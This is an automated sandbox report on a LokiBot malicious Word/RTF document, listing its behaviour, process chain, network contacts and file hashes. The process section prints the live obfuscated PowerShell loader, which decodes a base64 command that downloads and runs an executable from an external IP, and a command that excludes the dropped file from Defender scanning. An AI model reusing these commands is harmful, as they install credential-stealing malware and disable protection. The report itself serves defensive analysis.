Malware Analysis Report

2025-04-03 09:50

Sample ID 241120-l7qt3svpgv
Target seemybestoptionforentiretimegivenmebackwith______suchagreatthignswithentiretimewithmegood______seethebestthignsalwaysgivnebestthigns.doc
SHA256 564a4e9044bd96c3c67ae4c596664a2d9a7ecd1962872ac836e051949fb109b1
Tags
lokibot collection defense_evasion discovery execution spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

564a4e9044bd96c3c67ae4c596664a2d9a7ecd1962872ac836e051949fb109b1

Threat Level: Known bad

The file seemybestoptionforentiretimegivenmebackwith______suchagreatthignswithentiretimewithmegood______seethebestthignsalwaysgivnebestthigns.doc was found to be: Known bad.

Malicious Activity Summary

lokibot collection defense_evasion discovery execution spyware stealer trojan

Lokibot family

Lokibot

Evasion via Device Credential Deployment

Command and Scripting Interpreter: PowerShell

Downloads MZ/PE file

Blocklisted process makes network request

Reads user/profile data of web browsers

Loads dropped DLL

Executes dropped EXE

Accesses Microsoft Outlook profiles

Drops file in System32 directory

Suspicious use of SetThreadContext

Drops file in Windows directory

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Office loads VBA resources, possible macro or embedded object present

Suspicious use of AdjustPrivilegeToken

Enumerates system info in registry

Modifies Internet Explorer settings

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

outlook_office_path

Launches Equation Editor

Suspicious behavior: AddClipboardFormatListener

Suspicious behavior: EnumeratesProcesses

outlook_win_path

Checks processor information in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-20 10:10

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-20 10:10

Reported

2024-11-20 10:13

Platform

win7-20241010-en

Max time kernel

102s

Max time network

106s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\seemybestoptionforentiretimegivenmebackwith______suchagreatthignswithentiretimewithmegood______seeth.rtf"

Signatures

Lokibot

trojan spyware stealer lokibot

Lokibot family

lokibot

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE N/A
N/A N/A C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Evasion via Device Credential Deployment

defense_evasion execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\wininit.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wininit.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wininit.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Users\Admin\AppData\Roaming\wininit.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Roaming\wininit.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Roaming\wininit.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe N/A
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2700 set thread context of 1984 N/A C:\Users\Admin\AppData\Roaming\wininit.exe C:\Users\Admin\AppData\Roaming\wininit.exe

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\wininit.exe N/A

Office loads VBA resources, possible macro or embedded object present

Launches Equation Editor

exploit
Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\wininit.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\wininit.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2824 wrote to memory of 2880 N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE C:\Windows\SysWOW64\mshta.exe
PID 2824 wrote to memory of 2880 N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE C:\Windows\SysWOW64\mshta.exe
PID 2824 wrote to memory of 2880 N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE C:\Windows\SysWOW64\mshta.exe
PID 2824 wrote to memory of 2880 N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE C:\Windows\SysWOW64\mshta.exe
PID 2880 wrote to memory of 2500 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe
PID 2880 wrote to memory of 2500 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe
PID 2880 wrote to memory of 2500 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe
PID 2880 wrote to memory of 2500 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe
PID 2500 wrote to memory of 1056 N/A C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2500 wrote to memory of 1056 N/A C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2500 wrote to memory of 1056 N/A C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2500 wrote to memory of 1056 N/A C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2500 wrote to memory of 2184 N/A C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2500 wrote to memory of 2184 N/A C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2500 wrote to memory of 2184 N/A C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2500 wrote to memory of 2184 N/A C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2184 wrote to memory of 2364 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2184 wrote to memory of 2364 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2184 wrote to memory of 2364 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2184 wrote to memory of 2364 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2500 wrote to memory of 2700 N/A C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe C:\Users\Admin\AppData\Roaming\wininit.exe
PID 2500 wrote to memory of 2700 N/A C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe C:\Users\Admin\AppData\Roaming\wininit.exe
PID 2500 wrote to memory of 2700 N/A C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe C:\Users\Admin\AppData\Roaming\wininit.exe
PID 2500 wrote to memory of 2700 N/A C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe C:\Users\Admin\AppData\Roaming\wininit.exe
PID 1680 wrote to memory of 2356 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 1680 wrote to memory of 2356 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 1680 wrote to memory of 2356 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 1680 wrote to memory of 2356 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 2700 wrote to memory of 1804 N/A C:\Users\Admin\AppData\Roaming\wininit.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2700 wrote to memory of 1804 N/A C:\Users\Admin\AppData\Roaming\wininit.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2700 wrote to memory of 1804 N/A C:\Users\Admin\AppData\Roaming\wininit.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2700 wrote to memory of 1804 N/A C:\Users\Admin\AppData\Roaming\wininit.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2700 wrote to memory of 1420 N/A C:\Users\Admin\AppData\Roaming\wininit.exe C:\Users\Admin\AppData\Roaming\wininit.exe
PID 2700 wrote to memory of 1420 N/A C:\Users\Admin\AppData\Roaming\wininit.exe C:\Users\Admin\AppData\Roaming\wininit.exe
PID 2700 wrote to memory of 1420 N/A C:\Users\Admin\AppData\Roaming\wininit.exe C:\Users\Admin\AppData\Roaming\wininit.exe
PID 2700 wrote to memory of 1420 N/A C:\Users\Admin\AppData\Roaming\wininit.exe C:\Users\Admin\AppData\Roaming\wininit.exe
PID 2700 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Roaming\wininit.exe C:\Users\Admin\AppData\Roaming\wininit.exe
PID 2700 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Roaming\wininit.exe C:\Users\Admin\AppData\Roaming\wininit.exe
PID 2700 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Roaming\wininit.exe C:\Users\Admin\AppData\Roaming\wininit.exe
PID 2700 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Roaming\wininit.exe C:\Users\Admin\AppData\Roaming\wininit.exe
PID 2700 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Roaming\wininit.exe C:\Users\Admin\AppData\Roaming\wininit.exe
PID 2700 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Roaming\wininit.exe C:\Users\Admin\AppData\Roaming\wininit.exe
PID 2700 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Roaming\wininit.exe C:\Users\Admin\AppData\Roaming\wininit.exe
PID 2700 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Roaming\wininit.exe C:\Users\Admin\AppData\Roaming\wininit.exe
PID 2700 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Roaming\wininit.exe C:\Users\Admin\AppData\Roaming\wininit.exe
PID 2700 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Roaming\wininit.exe C:\Users\Admin\AppData\Roaming\wininit.exe

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Roaming\wininit.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Users\Admin\AppData\Roaming\wininit.exe N/A

Processes

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\seemybestoptionforentiretimegivenmebackwith______suchagreatthignswithentiretimewithmegood______seeth.rtf"

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\goodtoseeuthatgreatthingswithentirethingsgreatf.hta"

C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe

"C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'JGozckggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVyZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTE9ETWxJWUZIRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMcmQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtDTXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMWVBocGZaVmggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGozckg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly82Ni42My4xODcuMjMxLzMzL2Nhc3BvbC5leGUiLCIkRU52OkFQUERBVEFcd2luaW5pdC5leGUiLDAsMCk7U1RBUlQtU2xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3aW5pbml0LmV4ZSI='+[CHAR]0x22+'))')))"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\klunhxwy.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES74F2.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC74F1.tmp"

C:\Users\Admin\AppData\Roaming\wininit.exe

"C:\Users\Admin\AppData\Roaming\wininit.exe"

C:\Windows\splwow64.exe

C:\Windows\splwow64.exe 12288

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\wininit.exe"

C:\Users\Admin\AppData\Roaming\wininit.exe

"C:\Users\Admin\AppData\Roaming\wininit.exe"

C:\Users\Admin\AppData\Roaming\wininit.exe

"C:\Users\Admin\AppData\Roaming\wininit.exe"

Network

Country Destination Domain Proto
US 66.63.187.231:80 66.63.187.231 tcp
US 66.63.187.231:80 66.63.187.231 tcp
DE 94.156.177.41:80 94.156.177.41 tcp
DE 94.156.177.41:80 94.156.177.41 tcp
DE 94.156.177.41:80 94.156.177.41 tcp
DE 94.156.177.41:80 94.156.177.41 tcp

Files

memory/1680-0-0x000000002F271000-0x000000002F272000-memory.dmp

memory/1680-2-0x0000000070B3D000-0x0000000070B48000-memory.dmp

memory/1680-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

C:\Users\Admin\AppData\Roaming\goodtoseeuthatgreatthingswithentirethingsgreatf.hta

MD5 ec0d423a3f72d69975a1e31a275f5377
SHA1 213922fb8456ecaadc24889afec1ac6ef5010c68
SHA256 9fd433cd543ab161d2a3ccb96a265c79ee0bb1a513647c0c33c72114660c64ac
SHA512 8132f567abfd4e3489204d1f3a9fc8292457ce10495345cd0ccfa8074233411c8305c4d73078a7dee02b086fbc22b8ad7047dd4bc127de337d0800771edf53ad

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 c04f3c41985cc013413eaf2ceecf6a56
SHA1 ccfb117f414652e7d86e4fa5621e963780007e2e
SHA256 ee56fedc94cd68206a7f3bdb6b79f94f330526a5619325692cd56efcb859ea46
SHA512 71c79fa4f6c7ccb829c44c6a504be4922ac7eed6cbbf06ad99a072f3ad60df687f918c3837b13775b0348fbae0006694ed88bf246fb7a10895614c2018491623

\??\c:\Users\Admin\AppData\Local\Temp\klunhxwy.cmdline

MD5 c92670f3725404e64b76b8d9980423fc
SHA1 5d13b67ece4a024ab25fb99b91c22606c1a7e19d
SHA256 377d8c2b51a5cb5db8089cb24d224dbbeb8c5948d489ecd216f4735b40156c29
SHA512 5f4989b0e1280eefcb58a10a83fd009cedde8b91d0d98e47f28f53b0bf0475e567544736a8f65cdfebb1b643bfeba938781539fd37226488c8b2748b4c01b072

\??\c:\Users\Admin\AppData\Local\Temp\klunhxwy.0.cs

MD5 b0517586f4097114e790c61f2685f0d5
SHA1 20f7482298ab96731228ebd5242ceddfd72ff50f
SHA256 a738e3af6f29edd637630b0299f306056042ea1c73850eee95498499f5d90237
SHA512 c28702017ce7fe0d34bea38cef48df3bb65c63d92dddd6f8264f7262f7ae61b8d71bcd6fec06d0792373d15ba84fb2a1d0c26b0fe5755bc20505a9197d654ba0

\??\c:\Users\Admin\AppData\Local\Temp\CSC74F1.tmp

MD5 999c87e859de2b9b8b054d93932f84ac
SHA1 2271f2cd0b04f2c4c939246e09c73f6464e4d571
SHA256 b6c08100f15e6f8599dc10f196b3fd2d1dee3d6e6cf79f6d18f26097e1f1e8a3
SHA512 d0f88c16fc5100440eff04be383fceb1c3118288275022e35a0cb8058898cdc56b0751aa571374ea2054c03af63a73d8fb4fb70406675023c300760ef8cead2e

C:\Users\Admin\AppData\Local\Temp\RES74F2.tmp

MD5 89305fdda65d73947f803c5d5d091a4f
SHA1 482b23036f9eb4e66406aaeb180f4945df9878d9
SHA256 ded8bef05d8c334bd02025f80341eabd6412c416bd1870d70376e2e1697378dc
SHA512 55b17c46355203dd6668462bf0107a86316639ababe8c0823dba116982ac2cb76051ebf6bd97229be81c1ef30c599c0f1289d00d444f24d1dcf1bdb943f27308

C:\Users\Admin\AppData\Local\Temp\klunhxwy.dll

MD5 2199d8595aaf1be3e737f6802a96e1bc
SHA1 2e35254a31b08f01a6387b58fc1da40f32db4672
SHA256 966a05290311a4663d1fd0f1c133f2b0d85ba86a3f2cf4b2223658e50968febf
SHA512 c1077ca4743c2978ce33051d5edee78563c72e1444f59353d3208edc3ef635ffa1369d040e630b91baa7fe4350ca33bec6ee551a7314ff283a789561144107f6

C:\Users\Admin\AppData\Local\Temp\klunhxwy.pdb

MD5 85abcf4e5bbbc4c60ddd892a8362f94d
SHA1 dd80d4f21e9ae6177369d12aa2166c279fdd3c76
SHA256 95cd0f5128a760c6b211966bfd4cce1ccdb8e6c22cfb663deb81ba89c3f291cf
SHA512 ebd6fd66355b0e1afb20f6f4c8f5ac88a082febdbc822c35817811bfbed23ce93a82b93c99e26cd2f9e605e7878332b7e8d0bd74c807e9a25d87de7d50bde9f9

\Users\Admin\AppData\Roaming\wininit.exe

MD5 66b03d1aff27d81e62b53fc108806211
SHA1 2557ec8b32d0b42cac9cabde199d31c5d4e40041
SHA256 59586e753c54629f428a6b880f6aff09f67af0ace76823af3627dda2281532e4
SHA512 9f8ef3dd8c482debb535b1e7c9155e4ab33a04f8c4f31ade9e70adbd5598362033785438d5d60c536a801e134e09fcd1bc80fc7aed2d167af7f531a81f12e43d

memory/1680-51-0x0000000070B3D000-0x0000000070B48000-memory.dmp

memory/2700-52-0x0000000000100000-0x0000000000198000-memory.dmp

memory/2700-53-0x00000000003A0000-0x00000000003B2000-memory.dmp

memory/2700-54-0x0000000005150000-0x00000000051B4000-memory.dmp

memory/1984-56-0x0000000000400000-0x00000000004A2000-memory.dmp

memory/1984-69-0x0000000000400000-0x00000000004A2000-memory.dmp

memory/1984-67-0x0000000000400000-0x00000000004A2000-memory.dmp

memory/1984-66-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/1984-64-0x0000000000400000-0x00000000004A2000-memory.dmp

memory/1984-62-0x0000000000400000-0x00000000004A2000-memory.dmp

memory/1984-60-0x0000000000400000-0x00000000004A2000-memory.dmp

memory/1984-58-0x0000000000400000-0x00000000004A2000-memory.dmp

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3692679935-4019334568-335155002-1000\0f5007522459c86e95ffcc62f32308f1_6110149a-fcf0-442a-a749-601093ba4822

MD5 d898504a722bff1524134c6ab6a5eaa5
SHA1 e0fdc90c2ca2a0219c99d2758e68c18875a3e11e
SHA256 878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9
SHA512 26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3692679935-4019334568-335155002-1000\0f5007522459c86e95ffcc62f32308f1_6110149a-fcf0-442a-a749-601093ba4822

MD5 c07225d4e7d01d31042965f048728a0a
SHA1 69d70b340fd9f44c89adb9a2278df84faa9906b7
SHA256 8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a
SHA512 23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

memory/1984-94-0x0000000000400000-0x00000000004A2000-memory.dmp

memory/1984-103-0x0000000000400000-0x00000000004A2000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-20 10:10

Reported

2024-11-20 10:13

Platform

win10v2004-20241007-en

Max time kernel

133s

Max time network

142s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\seemybestoptionforentiretimegivenmebackwith______suchagreatthignswithentiretimewithmegood______seeth.rtf" /o ""

Signatures

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Processes

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\seemybestoptionforentiretimegivenmebackwith______suchagreatthignswithentiretimewithmegood______seeth.rtf" /o ""

Network

